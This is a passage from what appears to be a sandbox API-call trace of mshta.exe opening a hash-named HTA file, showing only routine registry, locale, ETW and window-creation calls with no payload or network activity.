ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.544] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.545] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.545] RegCloseKey (hKey=0x0) returned 0x6 [0046.545] RegCloseKey (hKey=0x0) returned 0x6 [0046.545] RegCloseKey (hKey=0x78) returned 0x0 [0046.545] RegCloseKey (hKey=0x7c) returned 0x0 [0046.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.545] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.545] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.545] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x80) returned 0x0 [0046.545] SHRegGetValueW () returned 0x2 [0046.545] SHRegGetValueW () returned 0x2 [0046.545] RegCloseKey (hKey=0x80) returned 0x0 [0046.545] RegCloseKey (hKey=0x0) returned 0x6 [0046.545] RegCloseKey (hKey=0x0) returned 0x6 [0046.545] RegCloseKey (hKey=0x7c) returned 0x0 [0046.545] RegCloseKey (hKey=0x78) returned 0x0 [0046.545] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.546] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.546] RegCloseKey (hKey=0x0) returned 0x6 [0046.546] RegCloseKey (hKey=0x0) returned 0x6 [0046.546] RegCloseKey (hKey=0x78) returned 0x0 [0046.546] RegCloseKey (hKey=0x7c) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.546] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.546] RegCloseKey (hKey=0x0) returned 0x6 [0046.546] RegCloseKey (hKey=0x0) returned 0x6 [0046.546] RegCloseKey (hKey=0x7c) returned 0x0 [0046.546] RegCloseKey (hKey=0x78) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.546] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.547] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.547] RegCloseKey (hKey=0x0) returned 0x6 [0046.547] RegCloseKey (hKey=0x0) returned 0x6 [0046.547] RegCloseKey (hKey=0x78) returned 0x0 [0046.547] RegCloseKey (hKey=0x7c) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.547] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.547] RegCloseKey (hKey=0x0) returned 0x6 [0046.547] RegCloseKey (hKey=0x0) returned 0x6 [0046.547] RegCloseKey (hKey=0x7c) returned 0x0 [0046.547] RegCloseKey (hKey=0x78) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.547] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.548] RegCloseKey (hKey=0x0) returned 0x6 [0046.548] RegCloseKey (hKey=0x0) returned 0x6 [0046.548] RegCloseKey (hKey=0x78) returned 0x0 [0046.548] RegCloseKey (hKey=0x7c) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.548] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.548] RegCloseKey (hKey=0x0) returned 0x6 [0046.548] RegCloseKey (hKey=0x0) returned 0x6 [0046.548] RegCloseKey (hKey=0x7c) returned 0x0 [0046.548] RegCloseKey (hKey=0x78) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x78) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.548] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.549] RegCloseKey (hKey=0x0) returned 0x6 [0046.549] RegCloseKey (hKey=0x0) returned 0x6 [0046.549] RegCloseKey (hKey=0x78) returned 0x0 [0046.549] RegCloseKey (hKey=0x7c) returned 0x0 [0046.549] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.549] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x78) returned 0x0 [0046.549] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.549] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.549] RegCloseKey (hKey=0x0) returned 0x6 [0046.549] RegCloseKey (hKey=0x0) returned 0x6 [0046.549] RegCloseKey (hKey=0x7c) returned 0x0 [0046.549] RegCloseKey (hKey=0x78) returned 0x0 [0046.549] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0046.551] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.551] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x80) returned 0x0 [0046.551] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.552] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.552] RegCloseKey (hKey=0x0) returned 0x6 [0046.552] RegCloseKey (hKey=0x0) returned 0x6 [0046.552] RegCloseKey (hKey=0x7c) returned 0x0 [0046.552] RegCloseKey (hKey=0x80) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x80) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x7c) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.552] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.552] RegCloseKey (hKey=0x0) returned 0x6 [0046.552] RegCloseKey (hKey=0x0) returned 0x6 [0046.552] RegCloseKey (hKey=0x80) returned 0x0 [0046.552] RegCloseKey (hKey=0x7c) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea98 | out: phkResult=0x30ea98*=0x7c) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaa0 | out: phkResult=0x30eaa0*=0x80) returned 0x0 [0046.552] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.553] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea28 | out: phkResult=0x30ea28*=0x0) returned 0x2 [0046.553] RegCloseKey (hKey=0x0) returned 0x6 [0046.553] RegCloseKey (hKey=0x0) returned 0x6 [0046.553] RegCloseKey (hKey=0x7c) returned 0x0 [0046.553] RegCloseKey (hKey=0x80) returned 0x0 [0046.553] GetSystemMetrics (nIndex=68) returned 4 [0046.553] GetSystemMetrics (nIndex=69) returned 4 [0046.553] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0046.554] GetSystemDefaultLCID () returned 0x409 [0046.555] GetVersionExW (in: lpVersionInformation=0x30ea90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30ea90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.555] GetUserDefaultUILanguage () returned 0x409 [0046.555] GetLocaleInfoW (in: Locale=0x409, LCType=0x58, lpLCData=0x30e930, cchData=16 | out: lpLCData="\x03") returned 16 [0046.557] GetKeyboardLayoutList (in: nBuff=32, lpList=0x30e990 | out: lpList=0x30e990) returned 1 [0046.558] GetSystemMetrics (nIndex=4096) returned 0 [0046.558] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eaf8 | out: phkResult=0x30eaf8*=0x80) returned 0x0 [0046.558] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30eb00 | out: phkResult=0x30eb00*=0x7c) returned 0x0 [0046.558] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea88 | out: phkResult=0x30ea88*=0x0) returned 0x2 [0046.558] RegOpenKeyExW (in: hKey=0x80, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x30ea88 | out: phkResult=0x30ea88*=0x0) returned 0x2 [0046.558] RegCloseKey (hKey=0x0) returned 0x6 [0046.558] RegCloseKey (hKey=0x0) returned 0x6 [0046.558] RegCloseKey (hKey=0x80) returned 0x0 [0046.558] RegCloseKey (hKey=0x7c) returned 0x0 [0046.558] GetModuleFileNameW (in: hModule=0x7feef840000, lpFilename=0x30e9a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e [0046.558] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3e) returned 0x4185b0 [0046.558] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0046.558] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0046.558] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0046.558] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0046.558] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0046.558] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc132 [0046.558] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc133 [0046.559] GetDC (hWnd=0x0) returned 0x120101e3 [0046.559] SHCreateShellPalette (hdc=0x0) returned 0x5f0801e8 [0046.559] GetPaletteEntries (in: hpal=0x5f0801e8, iStart=0x0, cEntries=0x100, pPalEntries=0x7fef0003224 | out: pPalEntries=0x7fef0003224) returned 0x100 [0046.560] SHGetInverseCMAP (in: pbMap=0x7fef0006308, cbMap=0x8 | out: pbMap=0x7fef0006308) returned 0x0 [0046.560] GetDeviceCaps (hdc=0x120101e3, index=38) returned 32409 [0046.560] ReleaseDC (hWnd=0x0, hDC=0x120101e3) returned 1 [0046.560] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20a) returned 0x41b9a0 [0046.560] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2000) returned 0x41bbc0 [0046.560] GetCurrentProcessId () returned 0xf10 [0046.560] _vsnprintf (in: _DstBuf=0x30ed40, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x30ebe8 | out: _DstBuf="#MSHTML#PERF#00000F10") returned 21 [0046.560] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000F10") returned 0x0 [0046.561] GetVersionExW (in: lpVersionInformation=0x30ec20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x10, dwBuildNumber=0x0, dwPlatformId=0x30ed28, szCSDVersion="") | out: lpVersionInformation=0x30ec20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0046.561] GetModuleHandleW (lpModuleName="advapi32") returned 0x7fefefb0000 [0046.561] GetProcAddress (hModule=0x7fefefb0000, lpProcName="EventWrite") returned 0x7782b510 [0046.561] GetProcAddress (hModule=0x7fefefb0000, lpProcName="EventRegister") returned 0x7783cac0 [0046.561] GetProcAddress (hModule=0x7fefefb0000, lpProcName="EventUnregister") returned 0x77823c80 [0046.561] EtwEventRegister (in: ProviderId=0x7feefeb0280, EnableCallback=0x7feef8443a0, CallbackContext=0x7fef0006310, RegHandle=0x7fef0004960 | out: RegHandle=0x7fef0004960) returned 0x0 [0046.561] EtwRegisterTraceGuidsW () returned 0x0 [0046.561] EtwRegisterTraceGuidsW () returned 0x0 [0046.561] EtwEventRegister (in: ProviderId=0x7feefeb0290, EnableCallback=0x7feef8443a0, CallbackContext=0x7fef00064c0, RegHandle=0x7fef0004968 | out: RegHandle=0x7fef0004968) returned 0x0 [0046.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\outllib.dll", lpdwHandle=0x30e994 | out: lpdwHandle=0x30e994) returned 0x0 [0046.563] GetModuleHandleW (lpModuleName=0x0) returned 0xff7a0000 [0046.563] GetModuleFileNameW (in: hModule=0xff7a0000, lpFilename=0x30e9a0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0046.563] PathFindFileNameW (pszPath="C:\\Windows\\System32\\mshta.exe") returned="mshta.exe" [0046.570] GetCurrentProcessId () returned 0xf10 [0046.570] GetCurrentProcessId () returned 0xf10 [0046.573] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0xa0 [0046.573] GetLastError () returned 0xb7 [0046.573] CreateFileMappingW (hFile=0xffffffffffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xa4 [0046.574] MapViewOfFile (hFileMappingObject=0xa4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1e0000 [0046.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x655d30 | out: hHeap=0x650000) returned 1 [0046.584] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x655e40 | out: hHeap=0x650000) returned 1 [0046.584] RegCloseKey (hKey=0x2a) returned 0x0 [0046.584] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000 [0046.584] GetProcAddress (hModule=0x776e0000, lpProcName="RegisterApplicationRestart") returned 0x7775f540 [0046.584] lstrlenA (lpString="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" ") returned 97 [0046.584] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc4) returned 0x655d30 [0046.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3f2f81, cbMultiByte=-1, lpWideCharStr=0x655d30, cchWideChar=98 | out: lpWideCharStr="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" ") returned 98 [0046.584] RegisterApplicationRestart (pwzCommandline="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" ", dwFlags=0x0) returned 0x0 [0046.586] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x655d30 | out: hHeap=0x650000) returned 1 [0046.586] GetProcAddress (hModule=0x7feef840000, lpProcName="RunHTMLApplication") returned 0x7feefa95b90 [0046.587] GetCommandLineW () returned="\"C:\\Windows\\System32\\mshta.exe\" \"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" " [0046.587] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc8) returned 0x423af0 [0046.588] OleInitialize (pvReserved=0x0) returned 0x0 [0047.794] IsWindow (hWnd=0x0) returned 0 [0047.794] RegisterClassW (lpWndClass=0x30f550) returned 0xc1bf [0047.795] CreateWindowExW (dwExStyle=0x0, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xff7a0000, lpParam=0x7fef00026a0) returned 0x60020 [0048.092] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x60020, hMenu=0x0, hInstance=0xff7a0000, lpParam=0x7fef00026a0) returned 0x40106 [0048.093] SetWindowLongW (hWnd=0x40106, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0048.094] SetWindowPos (hWnd=0x40106, hWndInsertAfter=0xfffffffffffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0048.099] SendMessageW (hWnd=0x40106, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0048.099] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xc8) returned 0x42c7f0 [0048.099] PathRemoveArgsW (in: pszPath="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\" " | out: pszPath="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\"") [0048.100] PathRemoveBlanksW (in: pszPath="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\"" | out: pszPath="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\"") [0048.100] PathUnquoteSpacesW (in: lpsz="\"C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta\"" | out: lpsz="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta") returned 1 [0048.100] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\KEECFM~1\\Desktop\\4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppmk=0x30f660*=0x0, dwFlags=0x1 | out: ppmk=0x30f660*=0x414180) returned 0x0 [0048.112] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42c7f0 | out: hHeap=0x3f0000) returned 1 [0048.112] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4218c0 [0048.113] CoCreateInstance (in: rclsid=0x7feefeb0cf0*(Data1=0x3050f5c8, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7feeff0de80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7fef0002738 | out: ppv=0x7fef0002738*=0x435570) returned 0x0 [0048.507] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x468) returned 0x4334b0 [0048.508] GetCurrentThreadId () returned 0xf14 [0048.508] RegisterClassExW (param_1=0x30e030) returned 0xc171 [0048.508] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc171, lpWindowName=0x0, dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x7feef840000, lpParam=0x0) returned 0x6030e [0048.509] GetWindowLongW (hWnd=0x6030e, nIndex=-20) returned 0 [0048.509] NtdllDefWindowProc_W () returned 0x1 [0048.509] NtdllDefWindowProc_W () returned 0x0 [0048.509] NtdllDefWindowProc_W () returned 0x0 [0048.509] NtdllDefWindowProc_W () returned 0x0 [0048.509] NtdllDefWindowProc_W () returned 0x0 [0048.509] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420950 [0048.509] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x420970 [0048.510] CreateCompatibleDC (hdc=0x0) returned 